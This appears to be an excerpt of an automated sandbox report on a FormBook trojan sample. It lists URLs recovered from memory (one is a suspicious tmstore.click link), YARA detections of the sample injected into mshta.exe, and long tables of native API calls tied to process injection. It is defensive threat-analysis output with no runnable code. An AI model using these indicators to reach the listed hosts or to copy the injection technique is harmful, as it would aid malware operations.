          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/public/images/build_brand/icon-arrow-long-right.svg);
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/public/images/logo.svg
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/radar/
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/start-contest
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/startups
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/taglines
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/testimonials-feedback
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/ultra-premium-marketplace/all
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/winners
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/youtube-name-generator
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: firefox.exe, 00000007.00000002.1912289226.0000000005864000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirect
          Source: mshta.exe, 00000003.00000002.3916202013.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.0000000003D42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0014C8B3 NtClose,0_2_0014C8B3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00121A70 NtProtectVirtualMemory,0_2_00121A70
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962B60 NtClose,LdrInitializeThunk,0_2_01962B60
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01962DF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01962C70
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019635C0 NtCreateMutant,LdrInitializeThunk,0_2_019635C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01964340 NtSetContextThread,0_2_01964340
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01964650 NtSuspendThread,0_2_01964650
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962B80 NtQueryInformationFile,0_2_01962B80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962BA0 NtEnumerateValueKey,0_2_01962BA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962BF0 NtAllocateVirtualMemory,0_2_01962BF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962BE0 NtQueryValueKey,0_2_01962BE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962AB0 NtWaitForSingleObject,0_2_01962AB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962AD0 NtReadFile,0_2_01962AD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962AF0 NtWriteFile,0_2_01962AF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962DB0 NtEnumerateKey,0_2_01962DB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962DD0 NtDelayExecution,0_2_01962DD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962D10 NtMapViewOfSection,0_2_01962D10
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962D00 NtSetInformationFile,0_2_01962D00
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962D30 NtUnmapViewOfSection,0_2_01962D30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962CA0 NtQueryInformationToken,0_2_01962CA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962CC0 NtQueryVirtualMemory,0_2_01962CC0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962CF0 NtOpenProcess,0_2_01962CF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962C00 NtQueryInformationProcess,0_2_01962C00
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962C60 NtCreateKey,0_2_01962C60
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962F90 NtProtectVirtualMemory,0_2_01962F90
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962FB0 NtResumeThread,0_2_01962FB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962FA0 NtQuerySection,0_2_01962FA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962FE0 NtCreateFile,0_2_01962FE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962F30 NtCreateSection,0_2_01962F30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962F60 NtCreateProcessEx,0_2_01962F60
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962E80 NtReadVirtualMemory,0_2_01962E80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962EA0 NtAdjustPrivilegesToken,0_2_01962EA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962EE0 NtQueueApcThread,0_2_01962EE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962E30 NtWriteVirtualMemory,0_2_01962E30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01963090 NtSetValueKey,0_2_01963090
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01963010 NtOpenDirectoryObject,0_2_01963010
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019639B0 NtGetContextThread,0_2_019639B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01963D10 NtOpenProcessToken,0_2_01963D10
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01963D70 NtOpenThread,0_2_01963D70
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03824340 NtSetContextThread,LdrInitializeThunk,3_2_03824340
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03824650 NtSuspendThread,LdrInitializeThunk,3_2_03824650
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03822BA0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03822BE0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03822BF0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822B60 NtClose,LdrInitializeThunk,3_2_03822B60
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822AD0 NtReadFile,LdrInitializeThunk,3_2_03822AD0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822AF0 NtWriteFile,LdrInitializeThunk,3_2_03822AF0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822FB0 NtResumeThread,LdrInitializeThunk,3_2_03822FB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822FE0 NtCreateFile,LdrInitializeThunk,3_2_03822FE0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822F30 NtCreateSection,LdrInitializeThunk,3_2_03822F30
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03822E80
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03822EE0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822DD0 NtDelayExecution,LdrInitializeThunk,3_2_03822DD0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03822DF0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03822D10
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03822D30
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03822CA0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822C60 NtCreateKey,LdrInitializeThunk,3_2_03822C60
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03822C70
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038235C0 NtCreateMutant,LdrInitializeThunk,3_2_038235C0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038239B0 NtGetContextThread,LdrInitializeThunk,3_2_038239B0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822B80 NtQueryInformationFile,3_2_03822B80
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822AB0 NtWaitForSingleObject,3_2_03822AB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822F90 NtProtectVirtualMemory,3_2_03822F90
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822FA0 NtQuerySection,3_2_03822FA0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822F60 NtCreateProcessEx,3_2_03822F60
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822EA0 NtAdjustPrivilegesToken,3_2_03822EA0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822E30 NtWriteVirtualMemory,3_2_03822E30
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822DB0 NtEnumerateKey,3_2_03822DB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822D00 NtSetInformationFile,3_2_03822D00
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822CC0 NtQueryVirtualMemory,3_2_03822CC0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822CF0 NtOpenProcess,3_2_03822CF0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03822C00 NtQueryInformationProcess,3_2_03822C00
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03823090 NtSetValueKey,3_2_03823090
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03823010 NtOpenDirectoryObject,3_2_03823010
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03823D10 NtOpenProcessToken,3_2_03823D10
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03823D70 NtOpenThread,3_2_03823D70
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F59210 NtCreateFile,3_2_02F59210
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F59380 NtReadFile,3_2_02F59380
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F59680 NtAllocateVirtualMemory,3_2_02F59680
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F59470 NtDeleteFile,3_2_02F59470
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F59510 NtClose,3_2_02F59510
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001387F30_2_001387F3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001300730_2_00130073
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001228F00_2_001228F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001231200_2_00123120
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001211500_2_00121150
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001369D30_2_001369D3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001369CE0_2_001369CE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001302930_2_00130293
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0012E3130_2_0012E313
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001224000_2_00122400
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001225A00_2_001225A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0014EF030_2_0014EF03
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F01AA0_2_019F01AA
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E41A20_2_019E41A2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E81CC0_2_019E81CC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CA1180_2_019CA118
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019201000_2_01920100
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B81580_2_019B8158
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C20000_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E3F00_2_0193E3F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F03E60_2_019F03E6
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EA3520_2_019EA352
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B02C00_2_019B02C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D02740_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F05910_2_019F0591
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019305350_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DE4F60_2_019DE4F6
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D44200_2_019D4420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E24460_2_019E2446
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192C7C00_2_0192C7C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019547500_2_01954750
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019307700_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194C6E00_2_0194C6E0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019329A00_2_019329A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019FA9A60_2_019FA9A6
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019469620_2_01946962
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019168B80_2_019168B8
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E8F00_2_0195E8F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193A8400_2_0193A840
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019328400_2_01932840
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E6BD70_2_019E6BD7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EAB400_2_019EAB40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA800_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01948DBF0_2_01948DBF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192ADE00_2_0192ADE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CCD1F0_2_019CCD1F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193AD000_2_0193AD00
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0CB50_2_019D0CB5
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920CF20_2_01920CF2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930C000_2_01930C00
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AEFA00_2_019AEFA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01922FC80_2_01922FC8
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193CFE00_2_0193CFE0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01950F300_2_01950F30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D2F300_2_019D2F30
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01972F280_2_01972F28
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A4F400_2_019A4F40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01942E900_2_01942E90
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019ECE930_2_019ECE93
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EEEDB0_2_019EEEDB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EEE260_2_019EEE26
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930E590_2_01930E59
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193B1B00_2_0193B1B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191F1720_2_0191F172
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019FB16B0_2_019FB16B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0196516C0_2_0196516C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DF0CC0_2_019DF0CC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019370C00_2_019370C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E70E90_2_019E70E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EF0E00_2_019EF0E0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0197739A0_2_0197739A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E132D0_2_019E132D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191D34C0_2_0191D34C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019352A00_2_019352A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194B2C00_2_0194B2C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D12ED0_2_019D12ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CD5B00_2_019CD5B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E75710_2_019E7571
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EF43F0_2_019EF43F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019214600_2_01921460
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EF7B00_2_019EF7B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E16CC0_2_019E16CC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C59100_2_019C5910
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019399500_2_01939950
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194B9500_2_0194B950
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019338E00_2_019338E0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199D8000_2_0199D800
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194FB800_2_0194FB80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A5BF00_2_019A5BF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0196DBF90_2_0196DBF9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EFB760_2_019EFB76
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CDAAC0_2_019CDAAC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01975AA00_2_01975AA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D1AA30_2_019D1AA3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DDAC60_2_019DDAC6
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EFA490_2_019EFA49
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E7A460_2_019E7A46
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A3A6C0_2_019A3A6C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194FDC00_2_0194FDC0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E1D5A0_2_019E1D5A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01933D400_2_01933D40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E7D730_2_019E7D73
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EFCF20_2_019EFCF2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A9C320_2_019A9C32
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01931F920_2_01931F92
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EFFB10_2_019EFFB1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EFF090_2_019EFF09
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01939EB00_2_01939EB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038B03E63_2_038B03E6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037FE3F03_2_037FE3F0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AA3523_2_038AA352
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038702C03_2_038702C0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038902743_2_03890274
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038B01AA3_2_038B01AA
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A41A23_2_038A41A2
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A81CC3_2_038A81CC
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037E01003_2_037E0100
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0388A1183_2_0388A118
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038781583_2_03878158
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038820003_2_03882000
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F07703_2_037F0770
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037EC7C03_2_037EC7C0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038147503_2_03814750
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0380C6E03_2_0380C6E0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038B05913_2_038B0591
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F05353_2_037F0535
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0389E4F63_2_0389E4F6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038944203_2_03894420
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A24463_2_038A2446
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A6BD73_2_038A6BD7
